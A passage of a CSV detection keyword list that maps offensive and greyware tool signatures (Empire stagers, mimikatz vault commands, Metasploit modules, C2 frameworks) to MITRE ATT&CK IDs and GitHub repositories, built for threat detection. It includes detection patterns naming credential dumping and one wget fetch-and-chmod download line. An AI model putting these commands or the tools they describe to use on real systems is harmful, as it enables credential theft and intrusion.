Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*users_asreproast.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*users_dcsrp_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*users_kerberoasting.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*users_list_cme_ldap_nullsess_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_list_kerbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_list_ridbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_no_req_pass.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*users_no_req_pass_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*usestager *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *backdoor*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *ducky*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *launcher_bat*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *launcher_lnk*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager *shellcode*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usestager multi/launcher*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*using donutCS*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*using NixImports*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*using SharpExfiltrate*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*using SharpView.Enums*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*using SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*Using VirusToal website as external C2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*UsoDllLoader*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","1","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" +"*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*usr/share/seclists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*usr/src/rusthound rusthound *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*util.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*util/dot_net_deserialization/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*utils/payloads.db*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Utils\Posh.cs*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*uTorrent (1).exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*uTorrent.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*utorrent_installer.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*utweb_installer.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*V3n0M-Scanner*","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Web Attacks","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","10","1342","432","2023-10-03T06:04:39Z","2013-10-21T06:05:17Z" +"*v4d1/Dome*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*valid_user@contoso.com:Password1*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*vanhauser-thc/thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*vault::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*vault::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*vault::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*vba-macro-mac-persistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*VBA-RunPE -*","offensive_tool_keyword","VBA-RunPE","A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.","T1055 - T1218 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/itm4n/VBA-RunPE","1","0","N/A","N/A","8","777","189","2019-12-17T10:32:43Z","2018-01-28T19:50:44Z" +"*vba-windows-persistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*vbs-obfuscator.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*VbulletinWidgetTemplateRce.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*vcenter_forge_saml_token*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vcenter_secrets_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vcenter_secrets_dump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vcsmap*","offensive_tool_keyword","vcsmap","vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.","T1210.001 - T1190 - T1538","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/melvinsh/vcsmap","1","0","N/A","N/A","2","131","25","2021-08-31T20:47:07Z","2016-08-21T11:23:57Z" 